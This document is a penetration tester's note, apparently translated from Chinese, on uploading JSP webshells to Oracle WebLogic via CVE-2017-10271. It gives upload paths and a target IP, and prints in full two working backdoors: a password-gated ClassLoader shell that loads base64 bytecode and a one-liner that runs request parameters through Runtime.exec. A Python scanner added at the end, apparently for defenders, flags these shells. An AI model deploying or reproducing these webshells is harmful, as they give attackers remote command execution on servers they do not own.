Tested with CVE-2017-10271. Unfortunately the Behinder (冰蝎) JSP shell did not work at first; it succeeded after switching to a different Behinder version.

1 Upload path
Absolute path on disk and the URL it is reachable at

Method 1
- /root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/123.jsp
- http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/123.jsp

Method 2
- /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/123/test.jsp
- http://...:7001/uddiexplorer/shell.jsp
uddiexplorer is not present on this target, so this route does not work.

Method 3
- /root/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/tmp/_WL_user/<project name>/<random string>/war/shell.jsp
- http://...:7001/<project name>/shell.jsp
application is not present on this target, so this route does not work.

2 Upload methods
(1) Testing that JSP is supported
Test by uploading this shell:
/root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/test.jsp
<% out.print("test"); %>
Check the corresponding directory:
ls /root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/
Requesting it proves that JSP is supported:
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/test.jsp
(2) AntSword (蚁剑)
Same method as before.
(3) Godzilla (哥斯拉)
Godzilla can generate its own JSP shell; upload it with the method above.
The shell it generates by default is already a JSP shell.
(4) One-liner
Upload the JSP one-liner from the end of this note:
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/yijuhua.jsp
(5) Behinder (冰蝎)

3 Extras
- In the unsupported case: I wrote a PHP shell and it was simply echoed straight back.
- AntSword JSP shell, password: passwd
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
- JSP one-liner
<%
    if ("123".equals(request.getParameter("pwd"))) {
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while ((a = in.read(b)) != -1) {
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
- Reference link
https://blog.csdn.net/weixin_30883311/article/details/99261700
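A defender-side check for the upload paths in section 1 and the shell patterns in section 3, added here as an example and not part of the original note: it walks the three WebLogic directory families named above, flags any .jsp dropped into the console images directory (which should only hold image files), and matches every JSP it finds against indicator regexes derived from the AntSword shell and the one-liner. The directory list, the regexes and the demo tree are constructed for this example; the Middleware root is assumed as an argument.

```python
import re
import tempfile
from pathlib import Path

# Indicator regexes derived from the two JSP shells shown on this page (constructed).
INDICATORS = {
    "runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\("),
    "defineclass_loader": re.compile(r"extends\s+ClassLoader|defineClass\("),
    "param_to_code": re.compile(r"request\.getParameter\("),
}
# The three directory families from section 1, relative to the Oracle Middleware root.
WRITABLE_WEB_DIRS = [
    "wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images",
    "user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal",
    "user_projects/domains/application/servers/AdminServer/tmp/_WL_user",
]


def score_jsp(text: str) -> list[str]:
    """Return the names of every indicator regex that matches this JSP source."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_weblogic_root(root: str) -> dict[str, list[str]]:
    """Walk the directory families under root and report each .jsp with its hits.
    Any .jsp under the console images directory is flagged on its own."""
    findings: dict[str, list[str]] = {}
    for rel in WRITABLE_WEB_DIRS:
        base = Path(root) / rel
        if not base.is_dir():
            continue
        for path in base.rglob("*.jsp"):
            hits = score_jsp(path.read_text(errors="replace"))
            if rel.endswith("/images"):
                hits.append("jsp_in_image_dir")
            findings[str(path.relative_to(root))] = hits
    return findings


def build_demo_tree() -> str:
    """Constructed demo tree: the page's benign test.jsp plus an inert file carrying indicators."""
    root = tempfile.mkdtemp(prefix="wls_demo_")
    images = Path(root) / WRITABLE_WEB_DIRS[0]
    images.mkdir(parents=True)
    (images / "test.jsp").write_text('<% out.print("test"); %>')
    (images / "suspect.jsp").write_text(
        '<%! class U extends ClassLoader { } %>\n<% request.getParameter("passwd"); %>\n')
    return root


if __name__ == "__main__":
    for path, hits in scan_weblogic_root(build_demo_tree()).items():
        print(path, "->", ", ".join(hits) or "no indicators")
```

On a real host, point scan_weblogic_root at the Middleware root (/root/Oracle/Middleware in this note) and treat any hit in the images directory as a file that should not exist there at all.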